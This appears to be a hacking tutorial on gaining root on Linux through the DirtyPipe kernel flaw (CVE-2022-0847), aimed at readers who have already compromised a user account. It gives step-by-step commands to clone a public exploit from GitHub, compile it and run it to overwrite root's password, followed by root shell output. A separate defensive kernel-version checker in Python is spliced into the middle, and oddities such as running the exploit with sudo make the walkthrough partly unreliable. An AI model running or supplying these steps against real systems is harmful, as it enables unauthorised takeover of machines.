Welcome back, my aspiring cyberwarriors!
Often, after successfully compromising a system, we are limited to the privileges of the compromised user. Regular users on most systems have very limited privileges and cannot access many resources (databases, etc.) or make changes to the system. This is one of the many ways that good system administrators secure their networks. Common routes to escalating privileges on Linux include:
Kernel Exploits
SUID/SGID misconfigurations
sudo
commands with escape characters
Service Exploits
Weak File Permissions
Environment Variables
Abusing Intended Functionality
In this tutorial, we will examine a kernel privilege escalation exploit named DirtyPipe. It was found by Max Kellermann and assigned CVE-2022-0847.
DirtyPipe is a local privilege escalation vulnerability in the Linux kernel that allows a local attacker to bypass file permissions and write arbitrary data into files under certain conditions. This means that a file such as /etc/shadow, where the system's password hashes are stored, can be overwritten with a new password hash.
Let's test this local privilege escalation exploit on Kali 2021.
Step #1: Testing for the Vulnerability
The first step is to determine whether your Linux kernel is vulnerable to Dirty Pipe. In this case, I'm using Kali 2021.
Kernel versions from 5.8 onward are vulnerable, and the bug was patched in 5.16. We can identify the running kernel version with the uname command.
kali > uname -a
Next, download a checker script that tests for the vulnerability:
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
kali > cd CVE-2022-0847-dirty-pipe-checker
Now, execute the dpipe.sh script from inside that directory:
kali > sudo ./dpipe.sh
As the output shows, this vulnerability checker confirmed that this Linux kernel is vulnerable to the Dirty Pipe privilege escalation exploit!
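The version reasoning in this step can be automated. The Python script below is an added example for this tutorial (it is not part of the page's own steps or of the dpipe.sh checker): it parses a `uname -r` string and classifies the kernel as affected, not affected, or inconclusive. The fix thresholds it uses (5.16.11, 5.15.25 and 5.10.102) are the upstream stable releases that carry the patch; the tutorial's "5.16" refers to the mainline series. It also handles the case a practitioner most often trips over: distribution kernels such as Kali's `5.10.0-kali9-amd64` report patch level 0 and backport fixes, so the version string alone cannot decide. Those are reported as inconclusive, which is exactly when a functional checker such as dpipe.sh is needed. The sample release strings are constructed for illustration.

```python
import platform
import re
from typing import Tuple

# Upstream fix points for CVE-2022-0847 (Dirty Pipe). The bug was introduced in
# 5.8 and fixed in the 5.16.11, 5.15.25 and 5.10.102 stable releases; these
# thresholds come from the upstream stable tree, not from the tutorial above.
INTRODUCED = (5, 8, 0)
FIXED_BY_SERIES = {
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}

# major.minor[.patch] followed by an optional distro suffix such as "-kali9-amd64"
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(.*)$")


def parse_release(release: str) -> Tuple[Tuple[int, int, int], str]:
    """Split a `uname -r` string into (major, minor, patch) and the trailing suffix."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0)), suffix


def assess_dirty_pipe(release: str) -> str:
    """Classify a kernel release string as 'not_affected', 'affected' or 'inconclusive'."""
    version, suffix = parse_release(release)
    if version < INTRODUCED:
        return "not_affected"          # bug was introduced in 5.8
    series = version[:2]
    if series > (5, 16):
        return "not_affected"          # 5.17 and later shipped with the fix
    # Distribution kernels (e.g. "5.10.0-kali9-amd64", "5.15.0-25-generic") keep
    # the upstream patch level at 0 and backport fixes; the string cannot decide.
    if version[2] == 0 and suffix:
        return "inconclusive"
    if series in FIXED_BY_SERIES:
        return "not_affected" if version >= FIXED_BY_SERIES[series] else "affected"
    # 5.8 .. 5.14 (other than 5.10) were end-of-life upstream before the fix landed
    return "affected"


def assess_local() -> str:
    """Assess the kernel this script is running on (uses the same string as `uname -r`)."""
    return assess_dirty_pipe(platform.release())


if __name__ == "__main__":
    # constructed sample release strings, not output captured from any real host
    samples = ["5.10.0-kali9-amd64", "5.15.24", "5.15.25", "5.10.102",
               "4.19.0-18-amd64", "5.12.3", "5.17.0"]
    for s in samples:
        print(f"{s:22} -> {assess_dirty_pipe(s)}")
    print(f"local kernel {platform.release()} -> {assess_local()}")
```

An "inconclusive" result is not a pass: on Debian-derived systems, compare the installed kernel package's changelog against the CVE, or run a functional checker as in the step above.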
Step #2: Download the Exploit
Now that we know that this Linux version is vulnerable, let’s attempt to exploit it to get root privileges.
First, download the exploit:
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Next, navigate to the new directory.
kali > cd CVE-2022-0847-DirtyPipe-Exploits
Now that we are in that directory, let's look inside.
kali > ls -l
Then compile the exploits with the supplied script.
kali > sudo ./compile.sh
Let’s run exploit-1 first.
kali > sudo ./exploit-1
It appears to have worked and changed the root password to “piped”!
Step #3: Login as Root
Let's now test whether we can log in as root.
kali > su root
Next, enter the new password "piped".
After doing so, run the whoami and id commands to confirm the new identity:
kali > whoami
root
kali > id
uid=0(root) groups=0(root), ……..
Success! Now you have root privileges on the system and can do whatever you want!
Summary
Escalating privileges is one of the key skills of a penetration tester/hacker. In many cases, we initially compromise an ordinary user account that lacks the privileges we need to take control of the system or network. The DirtyPipe kernel exploit is an excellent tool for escalating privileges on Linux systems released in approximately 2021-2022.